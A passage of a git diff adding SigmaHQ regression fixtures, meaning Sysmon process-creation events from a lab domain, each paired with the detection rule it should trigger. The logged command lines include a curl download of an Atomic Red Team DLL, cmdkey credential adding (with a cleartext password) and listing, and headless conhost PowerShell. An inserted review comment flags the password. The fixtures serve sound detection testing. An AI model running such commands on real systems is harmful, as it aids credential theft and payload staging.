"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" 
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml
new file mode 100644
index 000000000..faafff6e7
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml
@@ -0,0 +1,13 @@
+id: 20e20ac5-43f2-40a3-811c-53466d1be222
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: e9b61244-893f-427c-b287-3e708f321c6b
+ title: Potential Privilege Escalation Using Symlink Between Osk and Cmd
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx
new file mode 100644
index 000000000..6acc866af
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json
new file mode 100644
index 000000000..688d20394
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:16:49.968129Z" + } + }, + "EventRecordID": 8498306, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:16:49.961", + "ProcessGuid": "5AA13A44-CDC1-68FC-F82F-000000004002", + "ProcessId": 608, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"rmdir /s /q malware_folder\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml
new file mode 100644
index 000000000..b700d79bf
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml
@@ -0,0 +1,13 @@
+id: 20a05730-38e8-4889-ab29-0723f185deb0
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 41ca393d-538c-408a-ac27-cf1e038be80c
+ title: Directory Removal Via Rmdir
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx
new file mode 100644
index 000000000..1269de85a
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json
new file mode 100644
index 000000000..89edb80bb
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:20:36.737647Z" + } + }, + "EventRecordID": 8565164, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:20:36.729", + "ProcessGuid": "5AA13A44-CEA4-68FC-1330-000000004002", + "ProcessId": 4944, + "Image": "C:\\Windows\\System32\\cmdkey.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Credential Manager Command Line Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "cmdkey.exe", + "CommandLine": "\"C:\\Windows\\system32\\cmdkey.exe\" /generic:TERMSRV/AR-WIN-DC /user:ATTACKRANGE\\Administrator /pass:1password2!", + "CurrentDirectory": "C:\\tools\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", + "ParentProcessGuid": "5AA13A44-0BE6-68FC-A61D-000000004002", + "ParentProcessId": 10004, + "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "ParentCommandLine": "powershell 
-noprofile", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml new file mode 100644 index 000000000..5139d0a67 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml @@ -0,0 +1,13 @@ +id: 56a1d988-b883-41dc-ba91-6077c43189df +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 + title: New Generic Credentials Added Via Cmdkey.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx new file mode 100644 index 000000000..0899acbdc Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json new file mode 100644 index 000000000..50408f0db --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json 
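Review bot: The `EventData.CommandLine` of this fixture carries a cleartext credential, `/pass:1password2!`, which is now part of the repository history and is likely to trip secret scanning on every clone and fork. If the selection of rule b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 does not depend on the password value, the event could be re-recorded with a placeholder such as `/pass:<REDACTED-LAB-PASSWORD>` (the paired .evtx must be regenerated too, since the checker runs against it, not against this JSON); if the literal has to stay, the accompanying info.yml should state that this is a disposable attack-range lab credential so scanner findings can be triaged quickly. The `ParentCommandLine` value `powershell -noprofile` is split across two physical lines here, which looks like a rendering artifact of this view rather than a line break inside the string.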
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:21:33.116889Z" + } + }, + "EventRecordID": 8581967, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:21:33.111", + "ProcessGuid": "5AA13A44-CEDD-68FC-1B30-000000004002", + "ProcessId": 7876, + "Image": "C:\\Windows\\System32\\cmdkey.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Credential Manager Command Line Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "cmdkey.exe", + "CommandLine": "cmdkey /list", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml
new file mode 100644
index 000000000..041649eee
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml
@@ -0,0 +1,13 @@
+id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 07f8bdc2-c9b3-472a-9817-5a670b872f53
+ title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx
new file mode 100644
index 000000000..2bda8a11e
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json
new file mode 100644
index 000000000..53caa5ede
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:38:32.006926Z" + } + }, + "EventRecordID": 12090706, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:38:32.006", + "ProcessGuid": "5AA13A44-0B18-68FD-6336-000000004002", + "ProcessId": 7232, + "Image": "C:\\Windows\\System32\\conhost.exe", + "FileVersion": "10.0.20348.4294 (WinBuild.160101.0800)", + "Description": "Console Window Host", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CONHOST.EXE", + "CommandLine": "conhost --headless powershell calc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=061B747FBA99B050D8874167AAD6D1D790F8A3A8,MD5=7E13A7EA7BD3601760E3838D99E31710,SHA256=D7714ECAE976F14B3AFA409FF5A3616E8D6D0CCE8269E611D7835A7C12235D6B,IMPHASH=AFF4D1EA89D0D66F7D04180143E61D12", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml
new file mode 100644
index 000000000..2b32667bf
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml
@@ -0,0 +1,13 @@
+id: 6e70bb8b-561e-4af4-bad6-f582c656d047
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 056c7317-9a09-4bd4-9067-d051312752ea
+ title: Powershell Executed From Headless ConHost Process
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx
new file mode 100644
index 000000000..0dc74bef2
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json
new file mode 100644
index 000000000..aebb8f310
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:23:21.381915Z" + } + }, + "EventRecordID": 8613670, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:23:21.362", + "ProcessGuid": "5AA13A44-CF49-68FC-2630-000000004002", + "ProcessId": 9032, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": 
"\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml
new file mode 100644
index 000000000..66f1312ef
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml
@@ -0,0 +1,13 @@
+id: e2254736-78df-48bf-acd9-e36f914e21bc
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468
+ title: Suspicious Curl.EXE Download
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx
new file mode 100644
index 000000000..68165e60f
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json
new file mode 100644
index 000000000..e934af837
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:41:03.540138Z" + } + }, + "EventRecordID": 8933629, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:41:03.533", + "ProcessGuid": "5AA13A44-D36F-68FC-CE30-000000004002", + "ProcessId": 5956, + "Image": "C:\\Users\\Administrator\\Downloads\\DirLister.exe", + "FileVersion": "2.0.0.0", + "Description": "DirLister.UI", + "Product": "DirLister.UI", + "Company": "DirLister", + "OriginalFileName": "DirLister.exe", + "CommandLine": "\"C:\\Users\\Administrator\\Downloads\\DirLister.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=561771830EDE663651F3E6D731656D5D9E2BB19A,MD5=909E97D239C54B4563B61573FAE63C22,SHA256=C939927D7AB06E05B1B6E4951E8F7C45E54BA4EC3CA9399D7E1D9F5CA67C849C,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", + "ParentProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ParentProcessId": 7680, + "ParentImage": "C:\\Windows\\explorer.exe", + "ParentCommandLine": "\"C:\\Windows\\explorer.exe\" /NoUACCheck", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml
new file mode 100644
index 000000000..7b674a61a
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml
@@ -0,0 +1,13 @@
+id: 3e64088e-d05c-4e03-ac62-d5961672d33e
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: b4dc61f5-6cce-468e-a608-b48b469feaa2
+ title: DirLister Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx
new file mode 100644
index 000000000..761e53394
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json
new file mode 100644
index 000000000..3af45afcc
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:44:33.440907Z" + } + }, + "EventRecordID": 8999629, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:44:33.433", + "ProcessGuid": "5AA13A44-D441-68FC-E330-000000004002", + "ProcessId": 7112, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v CurrentBuildNumber", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=E65FAA187D27D84106B78B909C06D405837EC64E,MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": 
"ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml
new file mode 100644
index 000000000..557e59e5d
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml
@@ -0,0 +1,13 @@
+id: 23b1ddfe-cb7d-4e2f-9ae3-d96eabe0f6e1
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 0022869c-49f7-4ff2-ba03-85ac42ddac58
+ title: System Information Discovery via Registry Queries
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx
new file mode 100644
index 000000000..6b65baa6f
